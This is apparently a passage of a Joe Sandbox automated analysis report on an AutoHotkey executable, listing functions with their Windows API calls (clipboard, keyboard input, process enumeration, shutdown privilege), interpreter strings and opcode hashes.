                                      • EmptyClipboard.USER32 ref: 00405184
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040519B
                                      • CloseClipboard.USER32 ref: 004051A4
                                      • GlobalUnlock.KERNEL32(00000000,00000000,-00000001), ref: 004051DB
                                      • GlobalFree.KERNEL32(00000000), ref: 004051ED
                                      • GlobalUnlock.KERNEL32(?,-00000001), ref: 00405203
                                      • CloseClipboard.USER32 ref: 00405208
                                        • Part of subcall function 00405260: GlobalUnlock.KERNEL32(00000000,74DEE0D0,?,00000000,00405259,SetClipboardData), ref: 0040527C
                                        • Part of subcall function 00405260: CloseClipboard.USER32 ref: 00405281
                                        • Part of subcall function 00405260: GlobalUnlock.KERNEL32(00000000,74DEE0D0,?,00000000,00405259,SetClipboardData), ref: 00405295
                                        • Part of subcall function 00405260: GlobalFree.KERNEL32(00000000), ref: 004052A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Global$Unlock$Clipboard$Close$Free$Empty
                                      • String ID: Can't open clipboard for writing.$EmptyClipboard$SetClipboardData
                                      • API String ID: 1414016178-2690908087
                                      • Opcode ID: c73e0caa30bde1bd22e9df05c7a86d4b6c09dbf97a423425490f2711cdd72d5a
                                      • Instruction ID: 8d1d48b6001d82658aec73d50d9fc647b4864f78e018f0f0a72cb5d81f1ac77b
                                      • Opcode Fuzzy Hash: c73e0caa30bde1bd22e9df05c7a86d4b6c09dbf97a423425490f2711cdd72d5a
                                      • Instruction Fuzzy Hash: 50316C71A01B019FDB30AFA6D8C4517BBE4EF51305324893FE18796AA1CB38E884CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00416450 Relevance: 19.9, APIs: 13, Instructions: 439keyboardwindowthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 0041647E
                                      • GetKeyboardState.USER32(?), ref: 0041654A
                                      • SetKeyboardState.USER32(?), ref: 004165E9
                                      • PostMessageW.USER32(00000000,00000100,?,00000000), ref: 00416615
                                      • PostMessageW.USER32(00000000,00000101,?,00000000), ref: 00416652
                                      • BlockInput.USER32(00000000), ref: 0041668E
                                      • GetForegroundWindow.USER32 ref: 004166EC
                                      • GetAsyncKeyState.USER32 ref: 0041671C
                                      • keybd_event.USER32(?,00000000,?,00000000), ref: 004167E7
                                      • GetAsyncKeyState.USER32(?), ref: 00416832
                                      • keybd_event.USER32(?,00000000,00000002,00000000), ref: 00416912
                                      • GetAsyncKeyState.USER32(?), ref: 0041694D
                                      • BlockInput.USER32(00000001), ref: 004169AE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: State$Async$BlockInputKeyboardMessagePostkeybd_event$CurrentForegroundThreadWindow
                                      • String ID:
                                      • API String ID: 802988723-0
                                      • Opcode ID: 7bdbf257f0675f6cb940170d5053c9fd39849ff9e705013827cf156930de4698
                                      • Instruction ID: 373af51758b1cfb73e14f7e3d7445ebf64b6756c6e97ed69fdd2b3924b22597b
                                      • Opcode Fuzzy Hash: 7bdbf257f0675f6cb940170d5053c9fd39849ff9e705013827cf156930de4698
                                      • Instruction Fuzzy Hash: 8702F3B05093859BDB11DF24D8447EB7FE5AB46318F09445FF88587391C63CC989CBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00484160 Relevance: 19.7, APIs: 13, Instructions: 170threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0048417A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ProcessThreadWindow
                                      • String ID:
                                      • API String ID: 1653199695-0
                                      • Opcode ID: c3d927dbe5d44382d6bc045fb318de5d0e8f67fbfa7f5f6e6d5b53711f78de40
                                      • Instruction ID: b239e7d7b5332848d61dbbbdbe924dfe08be1d45e7ca1f5319af6318759aa408
                                      • Opcode Fuzzy Hash: c3d927dbe5d44382d6bc045fb318de5d0e8f67fbfa7f5f6e6d5b53711f78de40
                                      • Instruction Fuzzy Hash: 22517C717083022BE320BF686C49B6F7BD8DBC1708F440C6AF90192682E7B8D844879E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042A3C0 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 434COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: Duplicate class definition.$Full class name is too long.$Invalid class name.$Missing class name.$Out of memory.$Syntax error in class definition.$This class definition is nested too deep.$__Class$extends
                                      • API String ID: 1038674560-3763243221
                                      • Opcode ID: 066de17c46d6b9157782770263903c6dc14135bf3431ddf4fcb7b9dfd7b1a775
                                      • Instruction ID: c21f3f0e24b054165d4d547b89fe1bf609704dfc47b75449ab7d33523ab9c9bf
                                      • Opcode Fuzzy Hash: 066de17c46d6b9157782770263903c6dc14135bf3431ddf4fcb7b9dfd7b1a775
                                      • Instruction Fuzzy Hash: 6DE1EF717002209FC714DF19E884AABB7E0EB98314F94846FEC498B351D778DDA5CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00416010 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 140COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 1214dc3ae6a7fd40633699512148976d7e630de926709595636ad10cc6a208c0
                                      • Instruction ID: 96da0fd9d2641e509dfa414d6ceeb0d5953e3562fb8b37af64d20daf0b8591b1
                                      • Opcode Fuzzy Hash: 1214dc3ae6a7fd40633699512148976d7e630de926709595636ad10cc6a208c0
                                      • Instruction Fuzzy Hash: 7F41553466839065F7109728DC117FB2FA09B42B45F09806FEAC84B2C7DAA8C884D76F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0048E630 Relevance: 17.1, Strings: 13, Instructions: 825COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$Error text not found (please report)$LF)$NO_START_OPT)$UCP)$UTF16)$no error
                                      • API String ID: 0-3688278424
                                      • Opcode ID: f7c8510000e31cd52ba6468268f918b3bc92d016c9fc1803b811cca95086361c
                                      • Instruction ID: e784635c8bd2139e10d2bec327dc58af05008652cf04d3307f37c6e1f2c8d748
                                      • Opcode Fuzzy Hash: f7c8510000e31cd52ba6468268f918b3bc92d016c9fc1803b811cca95086361c
                                      • Instruction Fuzzy Hash: C662C0719087918BD324AF16C8507BFB7E1FF94704F548D2EE59A87380E7789988CB86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004172F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 283COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 1e39c6bc1586c368e615f6a9ffd4d0a2371e6055849fad9f9b457ada5917eeb4
                                      • Instruction ID: 0b671fa1b11d50ee85d906a5dfa92b23e23413a49b8cf5a3d32f9b001b3c3a98
                                      • Opcode Fuzzy Hash: 1e39c6bc1586c368e615f6a9ffd4d0a2371e6055849fad9f9b457ada5917eeb4
                                      • Instruction Fuzzy Hash: 2CA1CE7064C2049FE718DB28D8847ABB7F2EB84355F58092FF88282391D73C99C5CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045F620 Relevance: 15.1, APIs: 10, Instructions: 123processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0045F635
                                      • Process32FirstW.KERNEL32(00000000,00000000), ref: 0045F647
                                      • __wcstoi64.LIBCMT ref: 0045F673
                                        • Part of subcall function 0049A060: wcstoxq.LIBCMT ref: 0049A081
                                      • Process32NextW.KERNEL32(00000000,?), ref: 0045F694
                                      • __wsplitpath.LIBCMT ref: 0045F6D5
                                      • __wcsicoll.LIBCMT ref: 0045F725
                                      • Process32NextW.KERNEL32(?,?), ref: 0045F73B
                                      • CloseHandle.KERNEL32(00000000), ref: 0045F74E
                                      • CloseHandle.KERNEL32(00000000), ref: 0045F761
                                      • CloseHandle.KERNEL32(?), ref: 0045F778
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CloseHandleProcess32$Next$CreateFirstSnapshotToolhelp32__wcsicoll__wcstoi64__wsplitpathwcstoxq
                                      • String ID:
                                      • API String ID: 2291101207-0
                                      • Opcode ID: a511926cdeb7f91de8ed4d270e043d63569d815aabd5049367311111dcf8d9ea
                                      • Instruction ID: b61aeac3330c6fc0907212593bc28a8b2898d2af38d80bc3250366cd3494e1dd
                                      • Opcode Fuzzy Hash: a511926cdeb7f91de8ed4d270e043d63569d815aabd5049367311111dcf8d9ea
                                      • Instruction Fuzzy Hash: FB31B2726043056BD720AF649C05BEF77A8EBC4311F04493EFA4687281E779D60DC79A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0047C320 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,?,?,?), ref: 0047C36C
                                      • FindClose.KERNEL32(00000000,?,?), ref: 0047C378
                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 0047C38C
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000,?,?,?,?), ref: 0047C3AC
                                      • WriteFile.KERNEL32(00000000,004CE5F4,00000004,?,00000000,?,?,?,?), ref: 0047C3F8
                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0047C416
                                      • CloseHandle.KERNEL32(00000000), ref: 0047C42B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: File$CloseFindWrite$AttributesCreateFirstHandle
                                      • String ID: \\?\
                                      • API String ID: 1175878799-4282027825
                                      • Opcode ID: 9c212303936b7a5f671ba9710735a1c836d152daf3b457fa4c6b024b5f2afd6e
                                      • Instruction ID: 1976c0860d5ae97e70c096ccffbe6f17a510b1299ada09306ca8f8e01cec2858
                                      • Opcode Fuzzy Hash: 9c212303936b7a5f671ba9710735a1c836d152daf3b457fa4c6b024b5f2afd6e
                                      • Instruction Fuzzy Hash: A431C531640301ABE3309B14EC85BEB77A8EF85764F04862EFD59D72D0E778D9058799
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045E220 Relevance: 12.3, APIs: 8, Instructions: 317comfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcschr.LIBCMT ref: 0045E308
                                      • _wcschr.LIBCMT ref: 0045E31A
                                      • GetFileAttributesW.KERNEL32(?), ref: 0045E32A
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0045E346
                                      • FindClose.KERNEL32(00000000), ref: 0045E356
                                      • CoInitialize.OLE32(00000000), ref: 0045E35E
                                      • CoCreateInstance.OLE32(004AD820,00000000,00000001,004AD810,?), ref: 0045E377
                                      • CoUninitialize.OLE32 ref: 0045E53B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: FileFind_wcschr$AttributesCloseCreateFirstInitializeInstanceUninitialize
                                      • String ID:
                                      • API String ID: 1700229770-0
                                      • Opcode ID: f5bb9c38b76af4fe31923416cf5a405901a0ddc251aa89f15f49a7819017bbc3
                                      • Instruction ID: 7d5700b65d5c0b3cc94dbbdebec1410630750c4ef42ded1b91404ece2eaad69e
                                      • Opcode Fuzzy Hash: f5bb9c38b76af4fe31923416cf5a405901a0ddc251aa89f15f49a7819017bbc3
                                      • Instruction Fuzzy Hash: 7BB1E0713043006BD718EF55CC81FAB73A9ABC9B19F00861EF9558B2D1DB78ED09879A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045F410 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39shutdownCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 0045F41A
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0045F421
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0045F43D
                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0045F465
                                      • GetLastError.KERNEL32 ref: 0045F46B
                                      • ExitWindowsEx.USER32(?,00000000), ref: 0045F47B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                      • String ID: SeShutdownPrivilege
                                      • API String ID: 107509674-3733053543
                                      • Opcode ID: 7325f94feda420dc9bf7e593d62788ec1114a17b55cf0063d1295077bd0826a0
                                      • Instruction ID: 6675aea9d9ebac214b47ffede83cc177252c8111554ece7bb8f4feaeee849d7b
                                      • Opcode Fuzzy Hash: 7325f94feda420dc9bf7e593d62788ec1114a17b55cf0063d1295077bd0826a0
                                      • Instruction Fuzzy Hash: 30F04FB5644300AFE300AF64DC4AFAB7BA8FB85B05F404468FA46D5191D7B8D8099B6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00411570 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 245COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _wcsncpy$_memset
                                      • String ID: & $ Up
                                      • API String ID: 4291556967-3258026345
                                      • Opcode ID: 132984998aa353e6f24a1ded7884127514923fc392c6c53478ce405fbc71a4b1
                                      • Instruction ID: 39c92a6117fff7296a6b5c55d34b8bb0700b655a3fe0fa7ed7a4441e8d16f0fa
                                      • Opcode Fuzzy Hash: 132984998aa353e6f24a1ded7884127514923fc392c6c53478ce405fbc71a4b1
                                      • Instruction Fuzzy Hash: 0181D1316042418BDB259B2485A17FB7B91AF52304F1C405FDAD68B3A2E72F8CC9D39A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004191F0 Relevance: 10.6, APIs: 7, Instructions: 102keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardLayout.USER32(00000000), ref: 004191F9
                                      • _memset.LIBCMT ref: 00419222
                                      • ToUnicodeEx.USER32(0000006E,00000000,?,?,00000002,00000000,00000000), ref: 00419243
                                      • ToUnicodeEx.USER32(?,00000000,?,?,00000002,00000000,00000000), ref: 00419269
                                      • ToUnicodeEx.USER32(0000006E,00000000,?,?,00000002,00000000,00000000), ref: 00419286
                                      • ToUnicodeEx.USER32(?,00000000,?,?,00000002,00000000,00000000), ref: 004192CA
                                      • MapVirtualKeyExW.USER32(?,00000002,00000000), ref: 004192F3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Unicode$KeyboardLayoutVirtual_memset
                                      • String ID:
                                      • API String ID: 2910491412-0
                                      • Opcode ID: 5d553f8b48b261617fa6d631b5d9c2d1c2f6a7052819887c38918d14c7b5c5e8
                                      • Instruction ID: 04a7192e99da979fc19f9f86cdeb18db5ea9b4ed2cfc78fc0bb99be91a63fe8e
                                      • Opcode Fuzzy Hash: 5d553f8b48b261617fa6d631b5d9c2d1c2f6a7052819887c38918d14c7b5c5e8
                                      • Instruction Fuzzy Hash: 3E3104725483057BD320DB51CC56FFB7BE8AB85B04F404C1DF6859A0C1E2B5AA08C7AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D6C0 Relevance: 9.6, APIs: 3, Strings: 2, Instructions: 842COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0040D779
                                      • _memset.LIBCMT ref: 0040D79B
                                      • _memset.LIBCMT ref: 0040D7AD
                                        • Part of subcall function 0040E4F0: CreateThread.KERNEL32(00000000,00002000,0040E820,00000000,00000000,004D860C), ref: 0040E54A
                                        • Part of subcall function 0040E4F0: SetThreadPriority.KERNEL32(00000000,0000000F,?,00408D82,00000000,004089D8,An internal error has occurred in the debugger engine.Continue running the script without the debugger?,?,00000000,0040635D,?), ref: 0040E560
                                        • Part of subcall function 0040E4F0: PostThreadMessageW.USER32(00000000,00000417,0040635D,00000000), ref: 0040E584
                                        • Part of subcall function 0040E4F0: Sleep.KERNEL32(0000000A,?,00408D82,00000000,004089D8,An internal error has occurred in the debugger engine.Continue running the script without the debugger?,?,00000000,0040635D,?), ref: 0040E590
                                        • Part of subcall function 0040E4F0: GetTickCount.KERNEL32 ref: 0040E5A7
                                        • Part of subcall function 0040E4F0: PeekMessageW.USER32(?,00000000,00000417,00000417,00000001), ref: 0040E5CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Thread$Message_memset$CountCreatePeekPostPrioritySleepTick_malloc
                                      • String ID: [M$DlM
                                      • API String ID: 2797994793-220038877
                                      • Opcode ID: bfb5dc21c32668fc0c1379dbbe2934d5629fa9275b4532502e644762aab57110
                                      • Instruction ID: 7b406a6828f4e89809213e99691254d5450b9e791c58cd8a2256100b45d539f4
                                      • Opcode Fuzzy Hash: bfb5dc21c32668fc0c1379dbbe2934d5629fa9275b4532502e644762aab57110
                                      • Instruction Fuzzy Hash: BB8226309083818EE725CF24C4547B6BBE0AF55308F0885BFD8895B3D2D7BDA959C79A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418140 Relevance: 7.6, APIs: 5, Instructions: 84keyboardthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyState.USER32(00000000), ref: 0041814B
                                      • GetKeyState.USER32(00000000), ref: 0041817A
                                      • GetForegroundWindow.USER32(00000000), ref: 004181B4
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 004181BB
                                      • GetKeyState.USER32(00000014), ref: 004181FE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: State$Window$ForegroundProcessThread
                                      • String ID:
                                      • API String ID: 2921243749-0
